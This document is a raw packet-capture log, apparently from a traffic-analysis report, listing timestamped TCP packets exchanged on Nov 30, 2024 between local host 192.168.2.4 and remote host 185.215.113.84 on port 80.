                                                                                                                  Nov 30, 2024 01:55:23.574215889 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.575167894 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.575206041 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.575323105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.575361013 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.576301098 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.576339960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.576462984 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.576498985 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.577449083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.577491045 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.577614069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.577651024 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.578602076 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.578640938 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.578727961 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.578763962 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.579737902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.579793930 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.579905033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.579942942 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.580909014 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.580948114 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.581073046 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.581115961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.582106113 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.582154989 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.582211018 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.582248926 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.583189011 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.583231926 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.583348989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.583384991 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.584364891 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.584400892 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.584490061 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.584532022 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.585500956 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.585536003 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.585649967 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.585688114 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.586642981 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.586687088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.586808920 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.586848021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.587805986 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.587845087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.587938070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.587974072 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.588948965 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.588989973 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.589077950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.589121103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.590100050 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.590157032 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.590243101 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.590287924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.591244936 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.591288090 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.591383934 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.591422081 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.592447996 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.592489958 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.592572927 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.592617035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.593548059 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.593590021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.593678951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.593719006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.594707012 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.594750881 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.594871998 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.594913006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.595854998 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.595902920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.595997095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.596035957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.596987009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.597026110 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.597146988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.597186089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.598176003 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.598216057 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.598326921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.598361015 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.599289894 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.599325895 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.599457979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.599497080 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.600445986 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.600513935 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.600603104 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.600651026 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.601579905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.601617098 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.601754904 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.601794004 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.602757931 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.602792025 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.602874041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.602916002 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.603890896 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.603929043 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.604051113 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.604089975 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.605036974 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.605084896 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.605163097 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.605201960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.606178045 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.606215954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.606337070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.606374979 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.607409954 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.607453108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.607562065 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.607609034 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.608475924 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.608517885 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.608623981 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.608664036 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.609622955 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.609672070 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.609772921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.609814882 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.610769033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.610825062 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.610899925 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.610941887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.611910105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.611951113 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.612061977 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.612102985 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.613132954 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.613174915 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.613293886 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.613332987 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.614209890 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.614252090 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.614360094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.614398003 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.615361929 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.615396976 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.615518093 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.615556002 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.616523981 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.616563082 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.616672993 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.616709948 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.617643118 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.617683887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.617805958 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.617846012 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.618814945 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.618853092 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.618962049 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.618999958 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.619951963 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.619987011 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.620093107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.620136023 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.621097088 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.621153116 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.621238947 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.621273994 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.622237921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.622283936 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.622411013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.622445107 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.623436928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.623475075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.623588085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.623625040 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.624556065 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.624589920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.624715090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.624774933 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.625699043 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.625741005 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.625849009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.625891924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.626858950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.626895905 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.627018929 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.627055883 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.628005981 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.628041983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.628159046 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.628192902 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.629170895 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.629208088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.629293919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.629328012 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.630314112 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.630357027 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.630469084 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.630503893 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.631460905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.631513119 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.631614923 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.631649971 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.632564068 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.632601976 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.773438931 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.773536921 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.773539066 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.773705959 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.773859978 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.773902893 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.774257898 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.774302006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.774386883 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.774424076 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.775259972 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.775300980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.775428057 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.775460958 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.776422977 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.776467085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.776572943 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.776611090 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.777570009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.777604103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.777734995 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.777770996 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.778724909 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.778767109 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.778882980 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.778922081 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.779876947 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.779922009 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.780024052 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.780064106 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.781023026 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.781068087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.781222105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.781263113 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.782166004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.782221079 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.782310009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.782351017 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.783324957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.783409119 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.783519030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.783586025 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.784498930 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.784552097 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.784626007 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.784668922 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.785618067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.785660982 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.785767078 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.785805941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.786777973 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.786824942 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.786933899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.786971092 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.787928104 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.787981033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.788079023 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.788115978 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.789096117 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.789160967 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.789227962 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.789278984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.790219069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.790265083 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.790375948 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.790417910 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.791362047 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.791414976 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.791497946 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.791541100 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.792509079 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.792558908 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.792649031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.792690039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.793689013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.793759108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.793795109 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.793836117 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.794800997 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.794847965 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.794960976 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.795002937 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.795953989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.795998096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.796116114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.796158075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.797117949 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.797163963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.797277927 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.797322035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.798274994 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.798327923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.798454046 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.798515081 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.799393892 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.799442053 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.799546957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.799590111 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.800559998 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.800605059 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.800710917 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.800751925 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.801692009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.801740885 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.801841974 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.801896095 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:23.802823067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.803003073 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:23.803020000 CET4974080192.168.2.4185.215.113.84
